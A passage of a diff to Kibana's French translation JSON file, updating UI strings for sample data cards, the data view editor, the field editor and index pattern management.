Winlogbeat pour collecter des logs depuis le log des événements Windows. [En savoir plus]({learnMoreLink}).", "home.tutorials.windowsEventLogs.nameTitle": "Logs des événements Windows", "home.tutorials.windowsEventLogs.shortDescription": "Collectez et analysez les logs à partir de Windows Event Logs avec WinLogBeat.", "home.tutorials.windowsMetrics.artifacts.application.label": "Découverte", - "home.tutorials.windowsMetrics.longDescription": "Le module Metricbeat \"windows\" récupère des indicateurs depuis Windows. [En savoir plus]({learnMoreLink}).", "home.tutorials.windowsMetrics.nameTitle": "Indicateurs Windows", "home.tutorials.windowsMetrics.shortDescription": "Collectez les indicateurs à partir de Windows avec Metricbeat.", "home.tutorials.zeekLogs.artifacts.dashboards.linkLabel": "Aperçu de Zeek", - "home.tutorials.zeekLogs.longDescription": "Il s'agit d'un module pour Zeek, anciennement appelé Bro. Il analyse les logs qui sont au [format JSON Zeek](https://www.zeek.org/manual/release/logs/index.html). [En savoir plus]({learnMoreLink}).", "home.tutorials.zeekLogs.nameTitle": "Logs Zeek", "home.tutorials.zeekLogs.shortDescription": "Collectez et analysez les logs à partir de la sécurité réseau Zeek avec Filebeat.", "home.tutorials.zookeeperMetrics.artifacts.application.label": "Découverte", - "home.tutorials.zookeeperMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Zookeeper. [En savoir plus]({learnMoreLink}).", "home.tutorials.zookeeperMetrics.nameTitle": "Indicateurs Zookeeper", "home.tutorials.zookeeperMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Zookeeper avec Metricbeat.", "home.tutorials.zscalerLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.zscalerLogs.longDescription": "Ce module permet de recevoir des logs Zscaler NSS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.zscalerLogs.nameTitle": "Logs Zscaler", "home.tutorials.zscalerLogs.shortDescription": "Collectez et analysez les logs à partir de Zscaler NSS avec Filebeat.", "home.welcomeTitle": "Bienvenue dans Elastic", + "homePackages.sampleDataCard.addButtonAriaLabel": "Ajouter {datasetName}", + "homePackages.sampleDataCard.addingButtonAriaLabel": "Ajout de {datasetName}", + "homePackages.sampleDataCard.default.addButtonAriaLabel": "Ajouter {datasetName}", + "homePackages.sampleDataCard.default.unableToVerifyErrorMessage": "Impossible de vérifier le statut de l'ensemble de données. Erreur : {statusMsg}.", + "homePackages.sampleDataCard.removeButtonAriaLabel": "Supprimer {datasetName}", + "homePackages.sampleDataCard.removingButtonAriaLabel": "Suppression de {datasetName}", + "homePackages.sampleDataCard.viewDataButtonAriaLabel": "Consulter {datasetName}", "homePackages.sampleDataSet.installedLabel": "{name} installé", - "homePackages.sampleDataSet.unableToInstallErrorMessage": "Impossible d'installer l'exemple d’ensemble de données : {name}.", - "homePackages.sampleDataSet.unableToLoadListErrorMessage": "Impossible de charger la liste des exemples d’ensemble de données", - "homePackages.sampleDataSet.unableToUninstallErrorMessage": "Impossible de désinstaller l'exemple d’ensemble de données : {name}.", + "homePackages.sampleDataSet.unableToInstallErrorMessage": "Impossible d'installer l'exemple d’ensemble de données : {name}.", + "homePackages.sampleDataSet.unableToUninstallErrorMessage": "Impossible de désinstaller l'exemple d’ensemble de données : {name}.", "homePackages.sampleDataSet.uninstalledLabel": "{name} désinstallé", - "homePackages.sampleDataCard.addButtonAriaLabel": "Ajouter {datasetName}", + "homePackages.demoEnvironmentPanel.welcomeImageAlt": "Illustration des intégrations de données Elastic", + "homePackages.demoEnvironmentPanel.welcomeMessage": "Parcourez des données réelles dans un environnement de démonstration où vous pourrez explorer des cas d'utilisation de recherche, d'observabilité et de sécurité comme le vôtre.", + "homePackages.demoEnvironmentPanel.welcomeTitle": "Explorer notre environnement de démonstration en direct", "homePackages.sampleDataCard.addButtonLabel": "Ajouter des données", - "homePackages.sampleDataCard.addingButtonAriaLabel": "Ajout de {datasetName}", "homePackages.sampleDataCard.addingButtonLabel": "Ajout", "homePackages.sampleDataCard.dashboardLinkLabel": "Tableau de bord", - "homePackages.sampleDataCard.default.addButtonAriaLabel": "Ajouter {datasetName}", "homePackages.sampleDataCard.default.addButtonLabel": "Ajouter des données", - "homePackages.sampleDataCard.default.unableToVerifyErrorMessage": "Impossible de vérifier le statut de l'ensemble de données. Erreur : {statusMsg}.", - "homePackages.sampleDataCard.removeButtonAriaLabel": "Supprimer {datasetName}", "homePackages.sampleDataCard.removeButtonLabel": "Supprimer", - "homePackages.sampleDataCard.removingButtonAriaLabel": "Suppression de {datasetName}", "homePackages.sampleDataCard.removingButtonLabel": "Suppression", - "homePackages.sampleDataCard.viewDataButtonAriaLabel": "Consulter {datasetName}", "homePackages.sampleDataCard.viewDataButtonLabel": "Consulter les données", + "homePackages.sampleDataSet.unableToLoadListErrorMessage": "Impossible de charger la liste des exemples d’ensemble de données", + "homePackages.tutorials.sampleData.sampleDataLabel": "Autres exemples d’ensembles de données", + "indexPatternEditor.pagingLabel": "Lignes par page : {perPage}", + "indexPatternEditor.rollup.uncaughtError": "Erreur de vue de données de cumul : {error}", + "indexPatternEditor.status.matchAnyLabel.matchAnyDetail": "Votre modèle d'indexation peut correspondre à {sourceCount, plural, one {# source} other {# sources} }.", + "indexPatternEditor.status.notMatchLabel.allIndicesLabel": "{indicesLength, plural, one {# source} other {# sources} }", + "indexPatternEditor.status.notMatchLabel.notMatchDetail": "Le modèle d'indexation spécifié ne correspond à aucun flux de données, index ni alias d'index. Vous pouvez faire correspondre {strongIndices}.", + "indexPatternEditor.status.partialMatchLabel.partialMatchDetail": "Votre modèle d'indexation ne correspond à aucun flux de données, index ni alias d'index, mais {strongIndices} {matchedIndicesLength, plural, one {est semblable} other {sont semblables} }.", + "indexPatternEditor.status.partialMatchLabel.strongIndicesLabel": "{matchedIndicesLength, plural, one {source} other {# sources} }", + "indexPatternEditor.status.successLabel.successDetail": "Votre modèle d'indexation correspond à {sourceCount} {sourceCount, plural, one {source} other {sources} }.", "indexPatternEditor.aliasLabel": "Alias", "indexPatternEditor.createIndex.noMatch": "Le nom doit correspondre à au moins un flux de données, index ou alias d'index.", "indexPatternEditor.createIndexPattern.stepTime.noTimeFieldOptionLabel": "--- Je ne souhaite pas utiliser le filtre temporel ---", "indexPatternEditor.dataStreamLabel": "Flux de données", "indexPatternEditor.dataView.unableSaveLabel": "Échec de l'enregistrement de la vue de données.", - "indexPatternEditor.dataViewExists.ValidationErrorMessage": "Une vue de données avec ce titre existe déjà.", + "indexPatternEditor.dataViewExists.ValidationErrorMessage": "Une vue de données de ce nom existe déjà.", + "indexPatternEditor.editDataView.editConfirmationModal.confirmButton": "Confirmer", + "indexPatternEditor.editDataView.editConfirmationModal.editHeader": "Modifier \"{name}\"", + "indexPatternEditor.editDataView.editConfirmationModal.modalDescription": "La modification de cette vue de données peut briser les autres objets qui en dépendent.", "indexPatternEditor.editor.flyoutCloseButtonLabel": "Fermer", - "indexPatternEditor.editor.flyoutSaveButtonLabel": "Créer une vue de données", + "indexPatternEditor.editor.flyoutEditButtonLabel": "Enregistrer", + "indexPatternEditor.editor.flyoutExploreButtonLabel": "Utiliser sans sauvegarder", + "indexPatternEditor.editor.flyoutExploreButtonTitle": "Utiliser cette vue de données sans créer d’objet enregistré", + "indexPatternEditor.editor.flyoutSaveButtonLabel": "Enregistrer la vue de données dans Kibana", "indexPatternEditor.editor.form.advancedSettings.hideButtonLabel": "Masquer les paramètres avancés", "indexPatternEditor.editor.form.advancedSettings.showButtonLabel": "Afficher les paramètres avancés", "indexPatternEditor.editor.form.allowHiddenLabel": "Autoriser les index masqués et système", "indexPatternEditor.editor.form.customIdHelp": "Kibana fournit un identifiant unique pour chaque vue de données, ou vous pouvez en créer un vous-même.", "indexPatternEditor.editor.form.customIdLabel": "ID de vue de données personnalisé", + "indexPatternEditor.editor.form.IsAdHocLabel": "Créer une vue de données ad hoc", + "indexPatternEditor.editor.form.nameLabel": "Nom", "indexPatternEditor.editor.form.noTimeFieldsLabel": "Aucun flux de données, index ni alias d'index correspondant ne dispose d'un champ d'horodatage.", "indexPatternEditor.editor.form.runtimeType.placeholderLabel": "Sélectionner un champ d'horodatage", "indexPatternEditor.editor.form.timeFieldHelp": "Sélectionnez le champ d'horodatage à utiliser avec le filtre temporel global.", "indexPatternEditor.editor.form.timeFieldLabel": "Champ d'horodatage", "indexPatternEditor.editor.form.timestampFieldHelp": "Sélectionnez le champ d'horodatage à utiliser avec le filtre temporel global.", "indexPatternEditor.editor.form.timestampSelectAriaLabel": "Champ d'horodatage", - "indexPatternEditor.editor.form.titleLabel": "Nom", + "indexPatternEditor.editor.form.titleLabel": "Modèle d'indexation", "indexPatternEditor.editor.form.TypeLabel": "Type de vue de données", "indexPatternEditor.editor.form.typeSelectAriaLabel": "Champ Type", "indexPatternEditor.form.allowHiddenAriaLabel": "Autoriser les index masqués et système", "indexPatternEditor.form.customIndexPatternIdLabel": "ID de vue de données personnalisé", - "indexPatternEditor.form.titleAriaLabel": "Champ de titre", - "indexPatternEditor.frozenLabel": "Gelé", + "indexPatternEditor.form.nameAriaLabel": "Champ de nom facultatif", + "indexPatternEditor.form.titleAriaLabel": "Champ de modèle d'indexation", + "indexPatternEditor.frozenLabel": "Frozen", "indexPatternEditor.indexLabel": "Index", "indexPatternEditor.loadingHeader": "Recherche d'index correspondants…", - "indexPatternEditor.pagingLabel": "Lignes par page : {perPage}", "indexPatternEditor.requireTimestampOption.ValidationErrorMessage": "Sélectionnez un champ d'horodatage.", - "indexPatternEditor.rollup.uncaughtError": "Erreur de vue de données de cumul : {error}", - "indexPatternEditor.rollupDataView.createIndex.noMatchError": "Erreur de vue de données de cumul : doit correspondre à un index de cumul", - "indexPatternEditor.rollupDataView.createIndex.tooManyMatchesError": "Erreur de vue de données de cumul : ne peut correspondre qu’à un index de cumul", + "indexPatternEditor.rollupDataView.createIndex.noMatchError": "Erreur de vue de données de cumul : doit correspondre à un index de cumul", + "indexPatternEditor.rollupDataView.createIndex.tooManyMatchesError": "Erreur de vue de données de cumul : ne peut correspondre qu’à un index de cumul", "indexPatternEditor.rollupDataView.warning.textParagraphOne": "Kibana propose un support bêta pour les vues de données basées sur les cumuls. Vous pourriez rencontrer des problèmes lors de l'utilisation de ces vues dans les recherches enregistrées, les visualisations et les tableaux de bord. Ils ne sont pas compatibles avec certaines fonctionnalités avancées, telles que Timelion et le Machine Learning.", "indexPatternEditor.rollupDataView.warning.textParagraphTwo": "Vous pouvez mettre une vue de données de cumul en correspondance avec un index de cumul et zéro index régulier ou plus. Une vue de données de cumul dispose d'indicateurs, de champs, d'intervalles et d'agrégations limités. Un index de cumul se limite aux index disposant d'une configuration de tâche ou de plusieurs tâches avec des configurations compatibles.", "indexPatternEditor.rollupIndexPattern.warning.title": "Fonctionnalité bêta", "indexPatternEditor.rollupLabel": "Cumul", - "indexPatternEditor.status.matchAnyLabel.matchAnyDetail": "Votre modèle d'indexation peut correspondre à {sourceCount, plural, one {# source} other {# sources} }.", + "indexPatternEditor.saved": "'{indexPatternName}' enregistré", "indexPatternEditor.status.noSystemIndicesLabel": "Aucun flux de données, index ni alias d'index ne correspond à votre modèle d'indexation.", "indexPatternEditor.status.noSystemIndicesWithPromptLabel": "Aucun flux de données, index ni alias d'index ne correspond à votre modèle d'indexation.", - "indexPatternEditor.status.notMatchLabel.allIndicesLabel": "{indicesLength, plural, one {# source} other {# sources} }", - "indexPatternEditor.status.notMatchLabel.notMatchDetail": "Le modèle d'indexation spécifié ne correspond à aucun flux de données, index ni alias d'index. Vous pouvez faire correspondre {strongIndices}.", "indexPatternEditor.status.notMatchLabel.notMatchNoIndicesDetail": "Le modèle d'indexation spécifié ne correspond à aucun flux de données, index ni alias d'index.", - "indexPatternEditor.status.partialMatchLabel.partialMatchDetail": "Votre modèle d'indexation ne correspond à aucun flux de données, index ni alias d'index, mais {strongIndices} {matchedIndicesLength, plural, one {est semblable} other {sont semblables} }.", - "indexPatternEditor.status.partialMatchLabel.strongIndicesLabel": "{matchedIndicesLength, plural, one {source} other {# sources} }", - "indexPatternEditor.status.successLabel.successDetail": "Votre modèle d'indexation correspond à {sourceCount} {sourceCount, plural, one {source} other {sources} }.", "indexPatternEditor.title": "Créer une vue de données", + "indexPatternEditor.titleEditMode": "Modifier la vue de données", "indexPatternEditor.typeSelect.betaLabel": "Bêta", "indexPatternEditor.typeSelect.rollup": "Cumul", "indexPatternEditor.typeSelect.rollupDescription": "Effectuer des agrégations limitées à partir de données résumées", @@ -4676,9 +3797,19 @@ "indexPatternEditor.typeSelect.standardTitle": "Vue de données standard", "indexPatternEditor.validations.noSingleAstriskPattern": "Un seul astérisque \"*\" n’est pas un modèle d'indexation autorisé", "indexPatternEditor.validations.titleHelpText": "Entrez un modèle d'indexation qui correspond à une ou plusieurs sources de données. Utilisez un astérisque (*) pour faire correspondre plusieurs caractères. Les espaces et les caractères , /, ?, \", <, >, | ne sont pas autorisés.", - "indexPatternEditor.validations.titleIsRequiredErrorMessage": "Nom obligatoire.", + "indexPatternEditor.validations.titleIsRequiredErrorMessage": "Un modèle d'indexation est requis.", + "indexPatternFieldEditor.date.momentLabel": "Modèle de format Moment.js (par défaut : {defaultPattern})", + "indexPatternFieldEditor.defaultErrorMessage": "Une erreur s'est produite lors de l'utilisation de cette configuration de format : {message}.", + "indexPatternFieldEditor.defaultFormatHeader": "Format (par défaut : {defaultFormat})", + "indexPatternFieldEditor.deleteRuntimeField.confirmModal.deleteMultipleTitle": "Supprimer {count} champs", + "indexPatternFieldEditor.editField.flyoutAriaLabel": "Modifier le champ {fieldName}", + "indexPatternFieldEditor.editor.flyoutEditFieldSubtitle": "Vue de données : {patternName}", + "indexPatternFieldEditor.editor.form.source.scriptFieldHelpText": "Les champs d'exécution sans script récupèrent les valeurs de {source}. Si un champ n'existe pas dans _source, la recherche ne renvoie pas de valeur. {learnMoreLink}", + "indexPatternFieldEditor.editor.form.valueDescription": "Définissez une valeur pour le champ au lieu de la récupérer à partir du champ portant le même nom dans {source}.", + "indexPatternFieldEditor.fieldPreview.subTitle": "Depuis : {from}", + "indexPatternFieldEditor.number.numeralLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", "indexPatternFieldEditor.cancelField.confirmationModal.cancelButtonLabel": "Annuler", - "indexPatternFieldEditor.cancelField.confirmationModal.description": "Les modifications apportées à votre champ seront ignorées. Voulez-vous vraiment continuer ?", + "indexPatternFieldEditor.cancelField.confirmationModal.description": "Les modifications apportées à votre champ seront ignorées. Voulez-vous vraiment continuer ?", "indexPatternFieldEditor.cancelField.confirmationModal.title": "Ignorer les modifications", "indexPatternFieldEditor.color.actions": "Actions", "indexPatternFieldEditor.color.addColorButton": "Ajouter une couleur", @@ -4691,18 +3822,14 @@ "indexPatternFieldEditor.color.textColorLabel": "Couleur du texte", "indexPatternFieldEditor.createField.flyoutAriaLabel": "Créer un champ", "indexPatternFieldEditor.date.documentationLabel": "Documentation", - "indexPatternFieldEditor.date.momentLabel": "Modèle de format Moment.js (par défaut : {defaultPattern})", - "indexPatternFieldEditor.defaultErrorMessage": "Une erreur s'est produite lors de l'utilisation de cette configuration de format : {message}.", "indexPatternFieldEditor.defaultFormatDropDown": "- Par défaut -", - "indexPatternFieldEditor.defaultFormatHeader": "Format (par défaut : {defaultFormat})", "indexPatternFieldEditor.deleteField.savedHeader": "\"{fieldName}\" enregistré", "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.cancelButtonLabel": "Annuler", "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.removeButtonLabel": "Supprimer le champ", "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.removeMultipleButtonLabel": "Supprimer les champs", "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.saveButtonLabel": "Enregistrer les modifications", - "indexPatternFieldEditor.deleteRuntimeField.confirmModal.deleteMultipleTitle": "Supprimer {count} champs", "indexPatternFieldEditor.deleteRuntimeField.confirmModal.deleteSingleTitle": "Supprimer le champ \"{name}\"", - "indexPatternFieldEditor.deleteRuntimeField.confirmModal.multipleDeletionDescription": "Vous êtes sur le point de supprimer les champs d'exécution suivants :", + "indexPatternFieldEditor.deleteRuntimeField.confirmModal.multipleDeletionDescription": "Vous êtes sur le point de supprimer les champs d'exécution suivants :", "indexPatternFieldEditor.deleteRuntimeField.confirmModal.typeConfirm": "Saisissez REMOVE pour confirmer.", "indexPatternFieldEditor.deleteRuntimeField.confirmModal.warningChangingFields": "Modifier le nom ou le type peut affecter les recherches et les visualisations utilisant ce champ.", "indexPatternFieldEditor.deleteRuntimeField.confirmModal.warningRemovingFields": "Supprimer un champ peut affecter les recherches et les visualisations utilisant ce champ.", @@ -4712,11 +3839,9 @@ "indexPatternFieldEditor.duration.outputFormatLabel": "Format de sortie", "indexPatternFieldEditor.duration.showSuffixLabel": "Afficher le suffixe", "indexPatternFieldEditor.duration.showSuffixLabel.short": "Utiliser un suffixe court", - "indexPatternFieldEditor.durationErrorMessage": "Le nombre de décimales doit être compris entre 0 et 20.", - "indexPatternFieldEditor.editField.flyoutAriaLabel": "Modifier le champ {fieldName}", + "indexPatternFieldEditor.durationErrorMessage": "Le nombre de décimales doit être compris entre 0 et 20.", "indexPatternFieldEditor.editor.flyoutCancelButtonLabel": "Annuler", "indexPatternFieldEditor.editor.flyoutDefaultTitle": "Créer un champ", - "indexPatternFieldEditor.editor.flyoutEditFieldSubtitle": "Vue de données : {patternName}", "indexPatternFieldEditor.editor.flyoutEditFieldTitle": "Modifier le champ \"{fieldName}\"", "indexPatternFieldEditor.editor.flyoutSaveButtonLabel": "Enregistrer", "indexPatternFieldEditor.editor.form.advancedSettings.hideButtonLabel": "Masquer les paramètres avancés", @@ -4742,15 +3867,13 @@ "indexPatternFieldEditor.editor.form.scriptEditor.compileErrorMessage": "Erreur lors de la compilation du script Painless", "indexPatternFieldEditor.editor.form.scriptEditorAriaLabel": "Éditeur de script", "indexPatternFieldEditor.editor.form.scriptEditorPainlessValidationMessage": "Script Painless non valide.", - "indexPatternFieldEditor.editor.form.source.scriptFieldHelpText": "Les champs d'exécution sans script récupèrent les valeurs de {source}. Si un champ n'existe pas dans _source, la recherche ne renvoie pas de valeur. {learnMoreLink}", "indexPatternFieldEditor.editor.form.typeSelectAriaLabel": "Sélection du type", "indexPatternFieldEditor.editor.form.validations.customLabelIsRequiredErrorMessage": "Spécifiez une étiquette pour le champ.", "indexPatternFieldEditor.editor.form.validations.nameIsRequiredErrorMessage": "Nom obligatoire.", - "indexPatternFieldEditor.editor.form.validations.popularityGreaterThan0ErrorMessage": "La popularité doit être définie sur 0 ou plus.", + "indexPatternFieldEditor.editor.form.validations.popularityGreaterThan0ErrorMessage": "La popularité doit être définie sur 0 ou plus.", "indexPatternFieldEditor.editor.form.validations.popularityIsRequiredErrorMessage": "Spécifiez la popularité du champ.", "indexPatternFieldEditor.editor.form.validations.scriptIsRequiredErrorMessage": "Un script est obligatoire pour définir la valeur du champ.", "indexPatternFieldEditor.editor.form.validations.starCharacterNotAllowedValidationErrorMessage": "Le nom du champ ne peut pas contenir *.", - "indexPatternFieldEditor.editor.form.valueDescription": "Définissez une valeur pour le champ au lieu de la récupérer à partir du champ portant le même nom dans {source}.", "indexPatternFieldEditor.editor.form.valueTitle": "Définir la valeur", "indexPatternFieldEditor.editor.runtimeFieldsEditor.existRuntimeFieldNamesValidationErrorMessage": "Un champ portant ce nom existe déjà.", "indexPatternFieldEditor.fieldPreview.documentIdField.label": "ID de document", @@ -4775,7 +3898,6 @@ "indexPatternFieldEditor.fieldPreview.searchResult.emptyPromptTitle": "Aucun champ correspondant dans cette vue de données", "indexPatternFieldEditor.fieldPreview.showLessFieldsButtonLabel": "Afficher moins", "indexPatternFieldEditor.fieldPreview.showMoreFieldsButtonLabel": "Afficher plus", - "indexPatternFieldEditor.fieldPreview.subTitle": "Depuis : {from}", "indexPatternFieldEditor.fieldPreview.subTitle.customData": "Données personnalisées", "indexPatternFieldEditor.fieldPreview.title": "Aperçu", "indexPatternFieldEditor.fieldPreview.updatingPreviewLabel": "Mise à jour...", @@ -4790,7 +3912,6 @@ "indexPatternFieldEditor.histogram.subFormat.percent": "Pourcentage", "indexPatternFieldEditor.noSuchFieldName": "Champ \"{fieldName}\" introuvable dans le modèle d'indexation", "indexPatternFieldEditor.number.documentationLabel": "Documentation", - "indexPatternFieldEditor.number.numeralLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", "indexPatternFieldEditor.samples.inputHeader": "Entrée", "indexPatternFieldEditor.samples.outputHeader": "Sortie", "indexPatternFieldEditor.samplesHeader": "Exemples", @@ -4819,10 +3940,54 @@ "indexPatternFieldEditor.url.typeLabel": "Type", "indexPatternFieldEditor.url.urlTemplateLabel": "Modèle d'URL", "indexPatternFieldEditor.url.widthLabel": "Largeur", + "indexPatternManagement.createDataView.emptyState.createAnywayTxt": "Vous pouvez également {link}", + "indexPatternManagement.dataViewTable.deleteButtonLabel": "Supprimer {selectedItems, number} {selectedItems, plural, one {vue de données} other {vues de données} }", + "indexPatternManagement.dataViewTable.deleteConfirmSummary": "Vous allez supprimer de manière définitive {count, number} {count, plural, one {vue de données} other {vues de données} }.", + "indexPatternManagement.defaultFormatHeader": "Format (par défaut : {defaultFormat})", + "indexPatternManagement.deleteFieldLabel": "Il est impossible de récupérer un champ supprimé.{separator}Voulez-vous vraiment continuer ?", + "indexPatternManagement.editDataView.deleteWarning": "La vue de données {dataViewName} va être supprimée. Vous ne pouvez pas annuler cette action.", + "indexPatternManagement.editDataView.deleteWarningWithNamespaces": "Supprimer la vue de données {dataViewName} de tous les espaces dans lesquels elle est partagée. Vous ne pouvez pas annuler cette action.", + "indexPatternManagement.editHeader": "Modifier {fieldName}", + "indexPatternManagement.editIndexPattern.deprecation": "Les champs scriptés sont déclassés. Utilisez {runtimeDocs} à la place.", + "indexPatternManagement.editIndexPattern.fields.conflictModal.description": "Le type de champ {fieldName} change entre les index et peut ne pas être disponible pour la recherche, les visualisations et d'autres analyses.", + "indexPatternManagement.editIndexPattern.list.DateHistogramDelaySummary": "retard : {delay},", + "indexPatternManagement.editIndexPattern.list.dateHistogramSummary": "{aggName} (intervalle : {interval}, {delay} {time_zone})", + "indexPatternManagement.editIndexPattern.list.histogramSummary": "{aggName} (intervalle : {interval})", + "indexPatternManagement.editIndexPattern.mappingConflictLabel": "{conflictFieldsLength, plural, one {Un champ est défini} other {# champs sont définis}} avec plusieurs types (chaîne, entier, etc.) dans les différents index qui correspondent à ce modèle. Vous pourrez peut-être utiliser ce ou ces champs en conflit dans certaines parties de Kibana, mais ils ne seront pas disponibles pour les fonctions qui nécessitent que Kibana connaisse leur type. Pour corriger ce problème, vous devrez réindexer vos données.", + "indexPatternManagement.editIndexPattern.scripted.deprecationLangLabel.deprecationLangDetail": "Les langages déclassés suivants sont en cours d'utilisation : {deprecatedLangsInUse}. La prise en charge de ces langages sera supprimée dans la prochaine version majeure de Kibana et d'Elasticsearch. Convertissez vos champs scriptés en {link} pour éviter tout problème.", + "indexPatternManagement.editIndexPattern.tabs.relationshipsHeader": "Relations ({count})", + "indexPatternManagement.mappingConflictLabel.mappingConflictDetail": "{mappingConflict} Vous avez déjà un champ nommé {fieldName}. Si vous donnez le même nom à votre champ scripté, vous ne pourrez pas interroger les deux champs en même temps.", + "indexPatternManagement.script.accessWithLabel": "Accédez aux champs avec {code}.", + "indexPatternManagement.scriptedFieldsDeprecatedBody": "Pour profiter de plus de flexibilité et de la prise en charge des scripts Painless, utilisez {runtimeDocs}.", + "indexPatternManagement.syntax.defaultLabel.defaultDetail": "Par défaut, les champs scriptés Kibana emploient {painless}, un langage de script simple et sécurisé spécialement conçu pour Elasticsearch. Pour accéder aux valeurs du document, utilisez le format suivant :", + "indexPatternManagement.syntax.lucene.commonLabel.commonDetail": "Vous venez d'une ancienne version de Kibana ? Les expressions {lucene} que vous connaissez et adorez sont toujours disponibles. Les expressions Lucene ressemblent beaucoup à du JavaScript, mais elles se limitent aux opérations arithmétiques de base, aux opérations au niveau du bit et aux opérations de comparaison.", + "indexPatternManagement.syntax.lucene.operations.arithmeticLabel": "Opérateurs arithmétiques : {operators}", + "indexPatternManagement.syntax.lucene.operations.bitwiseLabel": "Opérateurs au niveau du bit : {operators}", + "indexPatternManagement.syntax.lucene.operations.booleanLabel": "Opérateurs booléens (y compris l'opérateur ternaire) : {operators}", + "indexPatternManagement.syntax.lucene.operations.comparisonLabel": "Opérateurs de comparaison : {operators}", + "indexPatternManagement.syntax.lucene.operations.distanceLabel": "Fonctions de distance : {operators}", + "indexPatternManagement.syntax.lucene.operations.mathLabel": "Fonctions mathématiques communes : {operators}", + "indexPatternManagement.syntax.lucene.operations.miscellaneousLabel": "Fonctions diverses : {operators}", + "indexPatternManagement.syntax.lucene.operations.trigLabel": "Fonctions de bibliothèque trigonométrique : {operators}", + "indexPatternManagement.syntax.painlessLabel.painlessDetail": "Painless est un langage puissant, mais facile à utiliser. Il donne accès à de nombreuses {javaAPIs}. Lisez-en plus sur sa {syntax} et découvrez tout ce que vous devez savoir en un rien de temps !", + "indexPatternManagement.warningCallOutLabel.callOutDetail": "Familiarisez-vous avec les {scripFields} et les {scriptsInAggregation} avant d'utiliser cette fonctionnalité. Les champs scriptés peuvent être utilisés pour afficher et agréger les valeurs calculées. Dès lors, ils peuvent être très lents et, s'ils ne sont pas faits correctement, ils peuvent rendre Kibana inutilisable.", + "indexPatternManagement.warningLabel.warningDetail": "{language} est déclassé et ne sera plus pris en charge dans la prochaine version majeure de Kibana et d'Elasticsearch. Nous recommandons d'utiliser {painlessLink} pour les nouveaux champs scriptés.", "indexPatternManagement.actions.cancelButton": "Annuler", "indexPatternManagement.actions.createButton": "Créer un champ", "indexPatternManagement.actions.deleteButton": "Supprimer", "indexPatternManagement.actions.saveButton": "Enregistrer le champ", + "indexPatternManagement.createDataView.emptyState.checkDataButton": "Rechercher de nouvelles données", + "indexPatternManagement.createDataView.emptyState.createAnywayLink": "créer une vue de données par rapport à des index masqués, système ou par défaut.", + "indexPatternManagement.createDataView.emptyState.haveData": "Vous pensez avoir déjà des données ?", + "indexPatternManagement.createDataView.emptyState.integrationCardDescription": "Ajoutez des données depuis diverses sources.", + "indexPatternManagement.createDataView.emptyState.integrationCardTitle": "Ajouter une intégration", + "indexPatternManagement.createDataView.emptyState.learnMore": "Envie d'en savoir plus ?", + "indexPatternManagement.createDataView.emptyState.noDataTitle": "Vous êtes prêt à essayer Kibana ? Tout d'abord, vous avez besoin de données.", + "indexPatternManagement.createDataView.emptyState.readDocs": "Lire la documentation", + "indexPatternManagement.createDataView.emptyState.sampleDataCardDescription": "Chargez un ensemble de données et un tableau de bord Kibana.", + "indexPatternManagement.createDataView.emptyState.sampleDataCardTitle": "Ajouter un exemple de données", + "indexPatternManagement.createDataView.emptyState.uploadCardDescription": "Importez un fichier CSV, NDJSON ou log.", + "indexPatternManagement.createDataView.emptyState.uploadCardTitle": "Charger un fichier", "indexPatternManagement.createHeader": "Créer un champ scripté", "indexPatternManagement.customLabel": "Étiquette personnalisée", "indexPatternManagement.dataView.sectionsHeader": "Vues de données", @@ -4833,8 +3998,6 @@ "indexPatternManagement.dataViewTable.columnDeleteDescription": "Supprimer cette vue de données", "indexPatternManagement.dataViewTable.createBtn": "Créer une vue de données", "indexPatternManagement.dataViewTable.dataViewColumnName": "Vue de données", - "indexPatternManagement.dataViewTable.deleteButtonLabel": "Supprimer {selectedItems, number} {selectedItems, plural, one {vue de données} other {vues de données} }", - "indexPatternManagement.dataViewTable.deleteConfirmSummary": "Vous allez supprimer de manière définitive {count, number} {count, plural, one {vue de données} other {vues de données} }.", "indexPatternManagement.dataViewTable.indexPatternExplanation": "Créez et gérez les vues de données afin de récupérer vos données depuis Elasticsearch.", "indexPatternManagement.dataViewTable.nameColumn": "Nom", "indexPatternManagement.dataViewTable.spaceCountAll": "tous", @@ -4843,32 +4006,27 @@ "indexPatternManagement.dataViewTable.tableTitle": "Vues de données sélectionnées pour la suppression", "indexPatternManagement.dataViewTable.title": "Vues de données", "indexPatternManagement.defaultFormatDropDown": "- Par défaut -", - "indexPatternManagement.defaultFormatHeader": "Format (par défaut : {defaultFormat})", "indexPatternManagement.deleteField.cancelButton": "Annuler", "indexPatternManagement.deleteField.deleteButton": "Supprimer", "indexPatternManagement.deleteField.deletedHeader": "\"’{fieldName}\" supprimé", "indexPatternManagement.deleteField.savedHeader": "\"{fieldName}\" enregistré", "indexPatternManagement.deleteFieldHeader": "Supprimer le champ \"{fieldName}\"", - "indexPatternManagement.deleteFieldLabel": "Il est impossible de récupérer un champ supprimé.{separator}Voulez-vous vraiment continuer ?", "indexPatternManagement.disabledCallOutHeader": "Scripts désactivés", "indexPatternManagement.disabledCallOutLabel": "Tous les scripts en ligne ont été désactivés dans Elasticsearch. Vous devez activer les scripts en ligne pour au moins un langage afin d'utiliser des champs scriptés dans Kibana.", "indexPatternManagement.editDataView.deleteHeader": "Supprimer la vue de données", - "indexPatternManagement.editDataView.deleteWarning": "La vue de données {dataViewName} va être supprimée. Vous ne pouvez pas annuler cette action.", - "indexPatternManagement.editDataView.deleteWarningWithNamespaces": "Supprimer la vue de données {dataViewName} de tous les espaces dans lesquels elle est partagée. Vous ne pouvez pas annuler cette action.", "indexPatternManagement.editDataView.detailsAria": "Détails de la vue de données", + "indexPatternManagement.editDataView.editAria": "Modifier la vue de données.", + "indexPatternManagement.editDataView.editTooltip": "Modifier", "indexPatternManagement.editDataView.fields.table.conflictType": "Conflit", "indexPatternManagement.editDataView.fields.table.runtimeIconTipText": "Ce champ existe uniquement dans la vue de données.", "indexPatternManagement.editDataView.removeAria": "Supprimer la vue de données.", - "indexPatternManagement.editDataView.removeTooltip": "Supprimer la vue de données.", + 